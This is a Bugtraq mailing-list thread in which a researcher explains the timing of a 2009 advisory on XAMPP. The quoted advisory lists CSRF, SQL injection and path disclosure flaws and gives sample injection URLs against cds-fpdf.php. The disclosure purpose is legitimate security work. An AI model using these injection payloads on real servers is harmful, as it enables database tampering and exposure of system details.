Bugtraq mailing list archives
Re: Multiple vulnerabilities in XAMPP (advisory #7)
From: "MustLive" <mustlive () websecurity com ua>
Date: Thu, 4 Feb 2010 22:01:57 +0200
Hello MaXe!
Have you checked the newest aka (also known as) latest version which is actually: 1.7.3 ?
No, I didn't and there was a reason for it. All these 7 advisories were made in 2009 (as it clear from Timeline which I made for all advisories). Only now I sent them to Bugtraq. And that time XAMPP 1.7.1 was the latest version. Besides, in 2009 developer of XAMPP answered me (with thanks) only at one of seven letters and he didn't mention about fixing any of holes which I found. So there is possibility that all or some of these holes are still not fixed. I'm rarely sending advisories about vulnerabilities to Bugtraq. During 2007-2010 I sent only small amount of my advisories to Bugtraq. From the end of 2006 I was sending all holes (http://securityvulns.ru/source15611.html) which I found to securityvulns.ru (securityvulns.com) and 3APA3A, admin of these sites, sometimes sent some of them to Bugtraq. Last month I drew attention that he didn't write to Bugtraq about all these holes in XAMPP, so I decided to write about them by myself :-). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua----- Original Message ----- From: advisories () intern0t net
To: bugtraq () securityfocus com ; MustLive Sent: Monday, February 01, 2010 10:53 AM Subject: Re: Multiple vulnerabilities in XAMPP (advisory #7) Hi MustLive Have you checked the newest aka (also known as) latest version which is actually: 1.7.3 ? Link: http://www.apachefriends.org/en/xampp-windows.html Best regards, MaXe On January 28, 2010 at 11:55 PM MustLive <mustlive () websecurity com ua> wrote:
Hello Bugtraq! I am continue informing you about multiple vulnerabilities in XAMPP. ----------------------------- Advisory #7 ----------------------------- CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP ----------------------------- URL: http://websecurity.com.ua/3285/ ----------------------------- Timeline: 27.06.2009 - found the vulnerabilities. 01.07.2009 - announced at my site. 02.07.2009 - informed developers. 08.08.2009 - disclosed at my site. ----------------------------- Details: These are Cross-Site Request Forgery, SQL Injection and Full path disclosure vulnerabilities. CSRF: http://site/xampp/cds-fpdf.php It's possible to delete or add data in test table (as via CSRF, and as via Insufficient Authorization vulnerabilities). And also to conduct SQL Injection via CSRF attacks. SQL Injection: http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on) http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1 http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off) http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off) Attack is possible during access to admin panel (via Insufficient Authorization), or via CSRF. Full path disclosure: http://site/xampp/external/ps/draw.php http://site/xampp/external/ps/hyperlinks.php http://site/xampp/external/ps/image.php http://site/xampp/external/ps/overprint.php http://site/xampp/external/ps/ps.php?submit=OK http://site/xampp/external/ps/shading.php http://site/xampp/external/ps/spotcolor.php http://site/xampp/external/ps/text.php http://site/xampp/special/ps/draw.php http://site/xampp/special/ps/hyperlinks.php http://site/xampp/special/ps/image.php http://site/xampp/special/ps/overprint.php http://site/xampp/special/ps/ps.php?submit=OK http://site/xampp/special/ps/shading.php http://site/xampp/special/ps/spotcolor.php http://site/xampp/special/ps/text.php Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next versions (including last version XAMPP 1.7.1). ----------------------------- Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
Current thread:
- Re: Multiple vulnerabilities in XAMPP (advisory #7) MustLive (Feb 04)
- Message not available
- Re: Multiple vulnerabilities in XAMPP (advisory #7) MustLive (Feb 08)
- Message not available